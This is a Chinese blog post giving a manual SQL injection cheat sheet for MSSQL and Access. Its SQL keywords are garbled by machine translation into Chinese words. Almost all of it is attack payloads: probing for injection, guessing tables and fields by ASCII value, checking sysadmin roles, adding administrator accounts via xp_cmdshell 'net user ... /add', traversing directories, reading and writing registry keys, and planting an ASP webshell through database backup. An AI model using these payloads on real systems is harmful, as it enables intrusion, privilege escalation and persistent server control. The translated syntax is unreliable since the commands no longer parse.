手工脚本注入
1,判断是否有注入;和1 = 1和1 = 2
2,初步判断是否是mssql的;和用户> 0
3,注入参数是字符'[查询条件],并与'' ='
4,搜索时没过滤参数的'[查询条件],然后和'%25'='
5,判断数据库系统
以及(从sysobjects中SELECT COUNT(*))> 0 MSSQL
及(SELECT COUNT(*)FROM MSysObjects资料)> 0访问
6猜数据库;和(SELECT COUNT(*)FROM [数据库名])> 0
7,猜字段;和(SELECT COUNT(字段名)从数据库名)> 0
8猜字段中记录长度;和(选取前1 LEN(字段名)从数据库名)> 0
9。(1)猜字段的ASCII值(访问)
以及(从数据库中选择顶部1 ASC(MID(字段名,1,1))名)> 0
(2)猜字段的ASCII码值(MSSQL)
及(选择顶部1的unicode(子串(字段名,1,1))从数据库名)> 0
10,测试权限结构(MSSQL)
和1 =(选择IS_SRVROLEMEMBER('系统管理员')); -
和1 =(选择IS_SRVROLEMEMBER('的ServerAdmin')); -
和1 =(选择IS_SRVROLEMEMBER('setupadmin')); -
和1 =(选择IS_SRVROLEMEMBER('securityadmin')); -
和1 =(选择IS_SRVROLEMEMBER('具有diskadmin')); -
和1 =(选择IS_SRVROLEMEMBER('bulkadmin')); -
和1 =(选择IS_MEMBER('的db_owner')); -
11,添加mssql的和系统的帐户
; EXEC master.dbo.sp_addlogin用户名; -
; EXEC master.dbo.sp_password空,用户名,密码; -
; EXEC master.dbo.sp_addsrvrolemember系统管理员的用户名; -
; EXEC master.dbo.xp_cmdshell'net user用户名密码
/工作站:* /时间:所有/ PASSWORDCHG:是/ PASSWORDREQ:是/活动:是/添加'; -
; EXEC master.dbo.xp_cmdshell'net user用户名密码/添加'; -
; EXEC master.dbo.xp_cmdshell'净本地管理员的用户名/添加'; -
12(1)遍历目录
;创建表显示目录(路径为varchar(100),ID INT)
;插入迪尔斯EXEC master.dbo.xp_dirtree'C:\'
及(选择迪尔斯顶部1路)> 0
;和>(从显示目录路径的地方不是在('上步得到的路径')选择顶部1路))
(2)遍历目录
;创建临时表(ID为nvarchar(255),NUM1为nvarchar(255),num2的数据类型为nvarchar(255),NUM3为nvarchar(255)); -
;插入温度EXEC master.dbo.xp_availablemedia; - 获得当前所有驱动器
;插入温度(ID)EXEC master.dbo.xp_subdirs'C:\'; - 获得子目录列表
;插入温度(身份证,NUM1)EXEC master.dbo.xp_dirtree'C:\'; - 获得所有子目录的目录树构
;插入温度(ID)EXEC master.dbo.xp_cmdshell'键入c:\ WEB \ INDEX.ASP'; - 查看文件的内容
13.mssql中的存储过程
xp_regenumvalues注册表根键,子键
; EXEC xp_regenumvalues'HKEY_LOCAL_MACHINE','SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \运行'以多个记录集方式返回所有键值
xp_regread根键,子键,键值名
;的exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION','CommonFilesDir'返回制定键的值
xp_regwrite根键,子键,值名,值类型,值
值类型有2种REG_SZ表示字符型,REG_DWORD表示整型
; EXEC xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION','TestValueName','REG_SZ','你好'写入注册表
xp_regdeletevalue根键,子键,值名
EXEC xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION','TestValueName'删除某个值
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ Testkey'删除键,包括该键下所有值
14.mssql的备份创建的webshell
使用模型
创建表的CMD(STR图像);
插入CMD(STR)的值('');
备份数据库模型到磁盘='C:\ l.asp';
15.mssql内置函数
及(SELECT @ @ VERSION)> 0获得的Windows的版本号
;而user_name()='dbo'上判断当前系统的连接用户是不是SA
及(选择USER_NAME())> 0爆当前系统的连接用户
及(选择DB_NAME())> 0得到当前连接的数据库
16。简洁的WEBSHELL
使用模型
创建表的CMD(STR图像);
插入CMD(STR)的值('');
备份数据库模型到磁盘='G:\ wwwtest \ l.asp';
© 黑狼's blog | 关注网络安全 | Powered by LOFTER